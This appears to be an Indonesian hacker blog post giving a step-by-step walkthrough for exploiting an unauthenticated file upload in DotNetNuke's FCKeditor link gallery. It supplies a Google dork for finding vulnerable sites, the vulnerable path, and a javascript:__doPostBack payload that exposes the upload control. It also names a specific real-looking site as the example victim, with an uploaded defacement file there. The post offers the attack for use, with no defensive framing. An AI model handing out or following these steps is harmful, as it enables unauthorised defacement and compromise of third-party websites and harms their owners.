e  eeeee eeeeeee eeeee  e     eeeee eeeee eeeee   e     e  eeeee e   e  
   8  8   8 8  8  8 8   8  8     8   8 8   8 8   8   8     8  8   8 8   8  
   8e 8eee8 8e 8  8 8eee8e 8e    8eee8 8e  8 8e      8e    8e 8e  8 8eee8e 
e  88 88  8 88 8  8 88   8 88    88  8 88  8 88 "8   88    88 88  8 88   8 
8ee88 88  8 88 8  8 88eee8 88eee 88  8 88  8 88ee8   88eee 88 88  8 88   8 
today : | at : | safemode : ON
> Disini Semua Terserah Oja Ajah...
name author perms com modified label

DNN(DotNetNuke) exploit oja ajah rwxr-xr-x 0 19.22

Filename DNN(DotNetNuke) exploit
Permission rw-r--r--
Author oja ajah
Date and Time 19.22
Label
Action
1.text di notepad
contoh bisa di lihat di sini >>
http://colonysquare-la.com/Portals/0/d1c.txt

lalu save di notepad dengan nama file contoh d1c.txt

2.mencari target web

dork >> inurl:”/portals/0″
search di google...!!

3.Praktek

contoh >> http://colonysquare-la.com/Portals/0/baby.txt << Target

kita potong setengah link diatas ,, hahaha kaya demo masak aja pake acara Potong link... :p

contoh >> http://colonysquare-la.com/ << harus seperti ini..!!
baru tambahkan >> /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
nanti seperti ini >>
http://colonysquare-la.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Enter..!!
lalu klik/ceklist Link Type: >> File ( A File On Your Site )

setelah di klik atto ceklis,hapus link di URL kosongkan..!!
http://colonysquare-la.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
/\
||
||
hapus semua..!!
lalu masukan ini di URL >> javascript:__doPostBack('ctlURL$cmdUpload','')
lalu ENTER..!!

lalu silahkan Upload dari kompi/PC anda file yg td di save contoh d1c.txt
jangan lupa klik >> Upload Selected File
selesai upload nanti seperti ini kelihatan di File Name: d1c.txt
untuk melihat hasilnya seperti ini >>

contoh >> http://colonysquare-la.com/Portals/0/d1c.txt

/Portals/0/... << bla..bla.. di isi nama file yg td anda upload.
nanti harus seperti ini >> /Portals/0/d1c.txt

lalu gabungkan sama link web yang depan dech,harus seperti ini

>> http://colonysquare-la.com/Portals/0/d1c.txt

Selamat Belajar :D
NB.
baca jg di sini >> http://securityreason.com/exploitalert/6234

0 komentar:

Posting Komentar

 

Jayalah Indonesiaku © 2010 Infokom I Software I Hardware I Teknologi Informasi
VB (Vio b374k) Template design by p4r46hcyb3rn3t